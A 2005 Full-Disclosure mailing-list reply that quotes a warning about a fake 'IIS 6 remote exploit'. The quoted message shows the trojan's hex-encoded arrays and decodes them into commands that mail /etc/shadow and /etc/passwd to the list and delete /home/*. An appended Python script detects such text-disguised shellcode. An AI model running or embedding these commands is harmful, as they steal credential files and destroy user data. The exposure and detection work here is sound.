RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

From: David Li (matrixhax0r_at_yahoo.com)
Date: 04/20/05

    Date: Tue, 19 Apr 2005 18:01:24 -0700 (PDT)
    To: "Lauro, John" <jlauro@umflint.edu>, full-disclosure@lists.grok.org.uk
    
    

    <sarcasm>Wait, you mean if I run that, I can hack IIS?</sarcasm>
    ^_^

    > Not that anyone would fall for running this on anything besides a test
    > system, but to save 30 seconds to decode, what it really does (locally,
    > not remotely) is:
    >
    > cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
    > cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
    > /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
    >
    > -----Original Message-----
    >
    > */
    > char shellcode[] =
    > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
    > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
    > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
    > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
    > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
    > "\x68\x65\x68\x65";
    >
    > char launcher [] =
    > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
    > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
    > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
    >
    > char netcat_shell [] =
    > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
    > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
    > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia - http://secunia.com/
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
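
Added example, not part of the original thread: a Python triage check for the pattern the quoted message describes, where a purported exploit's "shellcode" arrays are really hex-escaped shell commands. It runs on the `shellcode` array quoted above plus a constructed `opaque` array for contrast; the function names and the 0.95 threshold are assumptions of this example.

```python
import re

# Matches `char name[] = "..." "..." ;` built from adjacent string literals.
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=((?:\s*"[^"]*")+)\s*;')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
QUOTE_RE = re.compile(r'^[ \t]*(?:>[ \t]?)+', re.MULTILINE)

def decode_arrays(source):
    """Return {name: bytes} for each char array written as \\xNN escapes."""
    source = QUOTE_RE.sub('', source)  # drop e-mail quote markers
    return {name: bytes(int(h, 16) for h in HEX_RE.findall(lits))
            for name, lits in ARRAY_RE.findall(source)}

def printable_ratio(data):
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7e or b in (9, 10, 13))
    return ok / len(data)

def triage(source, threshold=0.95):
    """Map each array to its decoded text if it is plain ASCII, else None.

    Real machine code is mostly non-printable; an array that decodes to
    readable text is a command string and should be read before anything
    in the file is compiled or run.
    """
    report = {}
    for name, data in decode_arrays(source).items():
        is_text = printable_ratio(data) >= threshold
        report[name] = data.decode('ascii', 'replace') if is_text else None
    return report

# `shellcode` is the array quoted in this message; `opaque` is constructed.
SAMPLE = r'''
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
char opaque[] = "\x00\x01\x02\xfe\xff\x80\x81";
'''

if __name__ == '__main__':
    for name, text in triage(SAMPLE).items():
        print(name, '->', repr(text) if text else 'binary (not plain text)')
```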

